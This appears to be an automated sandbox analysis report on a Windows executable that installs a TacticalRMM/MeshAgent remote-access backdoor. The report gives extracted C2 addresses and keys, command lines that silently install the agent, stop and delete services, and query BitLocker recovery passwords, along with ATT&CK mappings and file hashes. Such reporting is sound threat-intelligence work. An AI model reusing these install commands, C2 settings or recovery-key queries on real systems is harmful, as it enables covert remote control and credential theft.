Overview

overview

10

Static

static

3

2024-11-19...ch.exe

windows7-x64

1

2024-11-19...ch.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    139s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-11-2024 10:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-11-19_d0e9d314c29867185f9e802dcc490060_frostygoop_luca-stealer_poet-rat_snatch.exe

  • Size

    5.0MB

  • MD5

    d0e9d314c29867185f9e802dcc490060

  • SHA1

    497aebefbb560065ab9c29d1faa96c8fed56146c

  • SHA256

    04db464b6a31437b0932cc3d86b2633c090af01a60423bcbc562364c899f2112

  • SHA512

    8423cfdc2a99806717b588c44bb65eb942aed051dfdb41ebfb3295555c0ed983fcc9d007c28b05b7eb9e2ba471038a102017fa13e39c756abb136eaa2e7ab317

  • SSDEEP

    49152:kgvUDWv4e4uPpV1wrb/T8vO90d7HjmAFd4A64nsfJJKyutrDb4HGw1lfVGlJS5ZL:D4e4uPpVm6gTVGIO7DfE++eC

Score
10/10
meshagenttacticalrmmbackdoordiscoveryevasionexecutionpersistencerattrojan

Malware Config

Extracted

Family

meshagent

Version

2

Botnet

TacticalRMM

C2

http://mesh.beraten-tech.de:443/agent.ashx

Attributes
  • mesh_id

    0xC2DBF8D5176E2795D03D1F2086E24D8503399C5B811169DE7D09CDA90EEF410CBE81B01B8A75A397214216EBA8427CB0

  • server_id

    AD48C3AA51248216A8C92D3FC4C1113ED99033BBAA3EAD73F71E07AACE6B685586E90C16830E5A7CE432D425CA12A7C6

  • wss

    wss://mesh.beraten-tech.de:443/agent.ashx

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

    rattrojanbackdoormeshagent
  • Meshagent family
    meshagent
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Executes dropped EXE 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
    evasionspywaretrojan
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-11-19_d0e9d314c29867185f9e802dcc490060_frostygoop_luca-stealer_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-11-19_d0e9d314c29867185f9e802dcc490060_frostygoop_luca-stealer_poet-rat_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4968
    • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
      C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1064
      • C:\Users\Admin\AppData\Local\Temp\is-UREE5.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-UREE5.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$1A0054,3652845,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3620
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1952
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2340
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrpc
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4756
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrpc
              6⤵
              • System Location Discovery: System Language Discovery
              PID:5040
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3468
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4760
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3188
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1816
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:3560
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3864
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2296
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2956
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM tacticalrmm.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2400
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4272
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalagent
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4668
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5072
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalrpc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4568
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c tacticalrmm.exe -m installsvc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            tacticalrmm.exe -m installsvc
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2372
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net start tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3292
          • C:\Windows\SysWOW64\net.exe
            net start tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3820
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1980
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.beraten-tech.de --client-id 1 --site-id 6 --agent-type workstation --auth dc3b53205b645d6c81dccd9d4bc35f3799b67dcb0aa0d3f196a48493e8cf1da6
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4516
      • C:\Program Files\TacticalAgent\meshagent.exe
        "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
        3⤵
        • Sets service image path in registry
        • Executes dropped EXE
        PID:4056
      • C:\Program Files\Mesh Agent\MeshAgent.exe
        "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
        3⤵
        • Executes dropped EXE
        PID:4856
  • C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    PID:1924
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4892
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:548
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3784
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
        PID:1692
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
          PID:2956
        • C:\Windows\System32\wbem\wmic.exe
          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
          2⤵
            PID:3084
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in System32 directory
            • Command and Scripting Interpreter: PowerShell
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1584
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in System32 directory
            • Command and Scripting Interpreter: PowerShell
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3988
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in System32 directory
            • Command and Scripting Interpreter: PowerShell
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4088
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1232
          • C:\Windows\system32\cmd.exe
            /c manage-bde -protectors -get C: -Type recoverypassword
            2⤵
              PID:4884
              • C:\Windows\system32\manage-bde.exe
                manage-bde -protectors -get C: -Type recoverypassword
                3⤵
                  PID:3684
              • C:\Windows\system32\cmd.exe
                /c manage-bde -protectors -get F: -Type recoverypassword
                2⤵
                  PID:4520
                  • C:\Windows\system32\manage-bde.exe
                    manage-bde -protectors -get F: -Type recoverypassword
                    3⤵
                      PID:2852
                • C:\Program Files\TacticalAgent\tacticalrmm.exe
                  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
                  1⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Modifies system certificate store
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4772
                • C:\Program Files\TacticalAgent\tacticalrmm.exe
                  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
                  1⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2268
                • C:\Program Files\TacticalAgent\tacticalrmm.exe
                  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
                  1⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2316
                • C:\Program Files\TacticalAgent\tacticalrmm.exe
                  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
                  1⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:432
                • C:\Program Files\TacticalAgent\tacticalrmm.exe
                  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
                  1⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2468

                Network

                MITRE ATT&CK Enterprise v15

                Reconnaissance

                Resource Development

                Initial Access

                Execution

                Command and Scripting Interpreter

                1
                T1059

                PowerShell

                1
                T1059.001

                System Services

                1
                T1569

                Service Execution

                1
                T1569.002

                Persistence

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Create or Modify System Process

                1
                T1543

                Windows Service

                1
                T1543.003

                Privilege Escalation

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Create or Modify System Process

                1
                T1543

                Windows Service

                1
                T1543.003

                Defense Evasion

                Impair Defenses

                1
                T1562

                Modify Registry

                2
                T1112

                Subvert Trust Controls

                1
                T1553

                Install Root Certificate

                1
                T1553.004

                Credential Access

                Discovery

                Query Registry

                1
                T1012

                Remote System Discovery

                1
                T1018

                System Location Discovery

                1
                T1614

                System Language Discovery

                1
                T1614.001

                System Network Configuration Discovery

                1
                T1016

                Internet Connection Discovery

                1
                T1016.001

                Lateral Movement

                Collection

                Command and Control

                Exfiltration

                Impact

                Service Stop

                1
                T1489

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Program Files\Mesh Agent\MeshAgent.db
                  Filesize

                  153KB

                  MD5

                  e83b0b4c725becb80edbff0bf4c75a00

                  SHA1

                  fcdb258c4a63bf6fb5dc2029e76312a675f59f7b

                  SHA256

                  da8d9d0c0e22c7fee4112f4903e43737a63c22a5836413b0d3ab8e48c71fb234

                  SHA512

                  af29928f14666f64f0af0841595e29990cb22dace49d41315d4a91c62fbe0e030c8a5ad963c3bf79fee38d7eaf3e33265adf9045cffb14b4339d07fb99d46767

                  Download Submit

                • C:\Program Files\TacticalAgent\agent.log
                  Filesize

                  115B

                  MD5

                  9d346d3a09169b2bb9f89a5b4a02954a

                  SHA1

                  af6e386266c682771e855f4fb2cdec2294797a1f

                  SHA256

                  1e92a2dc73fdfcb7aa7e456f337f49cbfd42be50f02c37e45bb13adce02351bb

                  SHA512

                  10b9c73867654e1d35c8c3c53ab54bad8698eac0110024bba28649388d1cda29b9dc62b76e5062f4ec67ebed38efa487e0292a0dd31e0d5f764df00b1e633397

                  Download Submit

                • C:\Program Files\TacticalAgent\agent.log
                  Filesize

                  230B

                  MD5

                  1dafbe146b770bbdecccf394fad9c15f

                  SHA1

                  ead1dc1559a6fd8b2b5b9795dbc969f3016adc73

                  SHA256

                  47cda497bfea03f0709b07fd3479bb03066841d37ede4267d7dd855724649f58

                  SHA512

                  b158b83a3bcdbf7a4fe502dffafca489aad93f4ed393db76cc971e2517ea5bb4ffbe1d120101de7c524fdd2fe7646b279a3b7433d65129f8dbb447599094a8d1

                  Download Submit

                • C:\Program Files\TacticalAgent\agent.log
                  Filesize

                  345B

                  MD5

                  c608345ba9fd364e7a0970e54e28af34

                  SHA1

                  d58184da4a74151db00871c9ce6b517a282f6a2e

                  SHA256

                  a29c86afe9983859a0cf7598ea76b6ae6ff77b34f7b2711a9aa8a323652feabd

                  SHA512

                  03c564c73b2c91463b2b7b6632d8a9160a9ab2c2369351fbb687b972b0368151ef99939b3eb6aa059065a501d44b5c45d8aa716d996e722998344bcc6fddc5b5

                  Download Submit

                • C:\Program Files\TacticalAgent\agent.log
                  Filesize

                  460B

                  MD5

                  3289c2e5869262553e9242f1d92da16a

                  SHA1

                  c40a5cc18fe326e1b71650ea9cd9d29d61760048

                  SHA256

                  9e2945db3277c70f05c49fb4639253220d492d4cde81cf5a89473d2617cc95c2

                  SHA512

                  5711d3d1441971d18e363b9d720a308acab3676a513ca96056508d6a4e69aa9b1c3bb7850bebab37691913012fabdb79bebbae8558f7126827cb246093cc79dc

                  Download Submit

                • C:\Program Files\TacticalAgent\meshagent.exe
                  Filesize

                  3.3MB

                  MD5

                  19a9bc4fa27b301997c94b10f652f54a

                  SHA1

                  45522bf1571f8e4130ac5346d6a5797eb8ff867a

                  SHA256

                  c3fe37b641c80ea4c863f9bf08faf32b6ac5c9a7f250bca14fca5beab7f12971

                  SHA512

                  0834d954e10681efe15305a158503085f8da6873e2b3ca36b95ea7bb7df12c11a3b38994712f17344535712b13816eb974df0dd70dd229770e4ad566a9dd821e

                  Download Submit

                • C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\cryptography-42.0.8.dist-info\INSTALLER
                  Filesize

                  4B

                  MD5

                  365c9bfeb7d89244f2ce01c1de44cb85

                  SHA1

                  d7a03141d5d6b1e88b6b59ef08b6681df212c599

                  SHA256

                  ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

                  SHA512

                  d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

                  Download Submit

                • C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pyasn1\codec\native\__init__.py
                  Filesize

                  59B

                  MD5

                  0fc1b4d3e705f5c110975b1b90d43670

                  SHA1

                  14a9b683b19e8d7d9cb25262cdefcb72109b5569

                  SHA256

                  1040e52584b5ef6107dfd19489d37ff056e435c598f4e555f1edf4015e7ca67d

                  SHA512

                  8a147c06c8b0a960c9a3fa6da3b30a3b18d3612af9c663ee24c8d2066f45419a2ff4aa3a636606232eca12d7faef3da0cbbd3670a2d72a3281544e1c0b8edf81

                  Download Submit

                • C:\Program Files\TacticalAgent\tacticalrmm.exe
                  Filesize

                  9.2MB

                  MD5

                  6cfbd2da5f304a3b8972eafe6fe4d191

                  SHA1

                  09c1600064cb9d157c55c88f76f107373404b2ae

                  SHA256

                  ad29d4e9e01870ffbdb6f2498e6ce36a708e56db2ad431ba2d80bf5a6caac069

                  SHA512

                  03a29d2eb00a97b3fc83e55a8b8b1fe3e7adbb06fe598ed5525bb3764caced0bf5a28a3fd70e36b66687fcce5a9e7c9243ee6ab3a82d394044f3c60714a423e8

                  Download Submit

                • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
                  Filesize

                  4.3MB

                  MD5

                  ed40540e7432bacaa08a6cd6a9f63004

                  SHA1

                  9c12db9fd406067162e9a01b2c6a34a5c360ea97

                  SHA256

                  d6c7bdab07151678b713a02efe7ad5281b194b0d5b538061bdafdf2c4ca1fdaa

                  SHA512

                  07653d534a998248f897a2ed962d2ec83947c094aa7fe4fb85e40cb2771754289fe2cef29e31b5aa08e8165d5418fe1b8049dedc653e799089d5c13e02352e8d

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\is-UREE5.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
                  Filesize

                  3.0MB

                  MD5

                  a639312111d278fee4f70299c134d620

                  SHA1

                  6144ca6e18a5444cdb9b633a6efee67aff931115

                  SHA256

                  4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

                  SHA512

                  f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

                  Download Submit

                • C:\Windows\Temp\__PSScriptPolicyTest_h2powjxk.pip.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  Download Submit

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                  Filesize

                  3KB

                  MD5

                  06d16fea6ab505097d16fcaa32949d47

                  SHA1

                  0c1c719831fa41cd102d0d72d61c0f46ec5b8de8

                  SHA256

                  54e15de2bef9f651d7717e2a336ac6b2ea2b723e6f29d2b153d8fbbc89aef723

                  SHA512

                  03c00f1eebb51cec11703141ae9d9c3ac589f5495bc04d8a4b043714089a9d50bd3a520e4d72b4a4c99f5b9bf5f689bf2585fa5c7d4ddbe6f71cbba0172f593a

                  Download Submit

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                  Filesize

                  2KB

                  MD5

                  b2ef2d4d15c695cd2a0c17491e05b054

                  SHA1

                  b10791244ee206ed5722cb5a4c2b480d21ce47d9

                  SHA256

                  efeea1a94044c8eb71a748a8829c0a946c6c460c24c5d045a5833d0f0520a97e

                  SHA512

                  291bcf3cce318c1a57ed745880a5eeae034908353ec0ed1e5602a58886f47b06b8e9cdcdbd9584a989f7477358462099c140a89797a1114d9f318a9107a26806

                  Download Submit

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                  Filesize

                  2KB

                  MD5

                  3a15434cec5e0fcf2e27f77751a8d727

                  SHA1

                  35ec0a9ea5b96e2506607f198cca319302e21093

                  SHA256

                  c8462e55259fa90b2c1e954725ab7045f45c1fa802f99046bd241a237a09b68d

                  SHA512

                  bddb77aaf90b4733375a66b4f519f98e8fb31905bf532623dd7e54de0496de89ca763b877b1d54a8454d6d47156820948aa0e246531ebbfd0ffa87d8c5e39caf

                  Download Submit

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                  Filesize

                  2KB

                  MD5

                  2c0bdf06d302688498d4e7f9cd669ab5

                  SHA1

                  18186323d93499e03f737f137b4ad795eb7f470b

                  SHA256

                  86cd6b95819282eee4bd6c900b27ebeddf453a90a9f6147978e9137479f36bd6

                  SHA512

                  f8f02ab1cb6906975695369183d00d7f25ec4c54c40aba5ac0a1f42312c5eff5a6774a8e84c3357415555405f7e9754deebe8335dd1fdcf693137ab044cc18fe

                  Download Submit

                • memory/1064-8-0x0000000000401000-0x00000000004B7000-memory.dmp

                  Filesize

                  728KB

                  Download

                • memory/1064-5-0x0000000000400000-0x00000000004D7000-memory.dmp

                  Filesize

                  860KB

                  Download

                • memory/1064-26-0x0000000000400000-0x00000000004D7000-memory.dmp

                  Filesize

                  860KB

                  Download

                • memory/1232-157-0x000001BCD69D0000-0x000001BCD6A85000-memory.dmp

                  Filesize

                  724KB

                  Download

                • memory/1232-159-0x000001BCD6A90000-0x000001BCD6AB4000-memory.dmp

                  Filesize

                  144KB

                  Download

                • memory/1232-158-0x000001BCD6A90000-0x000001BCD6ABA000-memory.dmp

                  Filesize

                  168KB

                  Download

                • memory/1584-61-0x000001FC8BAC0000-0x000001FC8BAE2000-memory.dmp

                  Filesize

                  136KB

                  Download

                • memory/1584-71-0x000001FCA4900000-0x000001FCA4944000-memory.dmp

                  Filesize

                  272KB

                  Download

                • memory/1584-72-0x000001FCA49D0000-0x000001FCA4A46000-memory.dmp

                  Filesize

                  472KB

                  Download

                • memory/3620-12-0x0000000000400000-0x0000000000712000-memory.dmp

                  Filesize

                  3.1MB

                  Download

                • memory/3620-25-0x0000000000400000-0x0000000000712000-memory.dmp

                  Filesize

                  3.1MB

                  Download

                • memory/3988-107-0x00000150CC9E0000-0x00000150CC9FA000-memory.dmp

                  Filesize

                  104KB

                  Download

                • memory/3988-110-0x00000150CC9D0000-0x00000150CC9DA000-memory.dmp

                  Filesize

                  40KB

                  Download

                • memory/3988-109-0x00000150CC9C0000-0x00000150CC9C6000-memory.dmp

                  Filesize

                  24KB

                  Download

                • memory/3988-108-0x00000150CC850000-0x00000150CC858000-memory.dmp

                  Filesize

                  32KB

                  Download

                • memory/3988-102-0x00000150CC820000-0x00000150CC83C000-memory.dmp

                  Filesize

                  112KB

                  Download

                • memory/3988-106-0x00000150CC840000-0x00000150CC84A000-memory.dmp

                  Filesize

                  40KB

                  Download

                • memory/3988-105-0x00000150CC9A0000-0x00000150CC9BC000-memory.dmp

                  Filesize

                  112KB

                  Download

                • memory/3988-104-0x00000150CC780000-0x00000150CC78A000-memory.dmp

                  Filesize

                  40KB

                  Download

                • memory/3988-103-0x00000150CC8E0000-0x00000150CC995000-memory.dmp

                  Filesize

                  724KB

                  Download

                • memory/4088-132-0x000002303B2F0000-0x000002303B3A5000-memory.dmp

                  Filesize

                  724KB

                  Download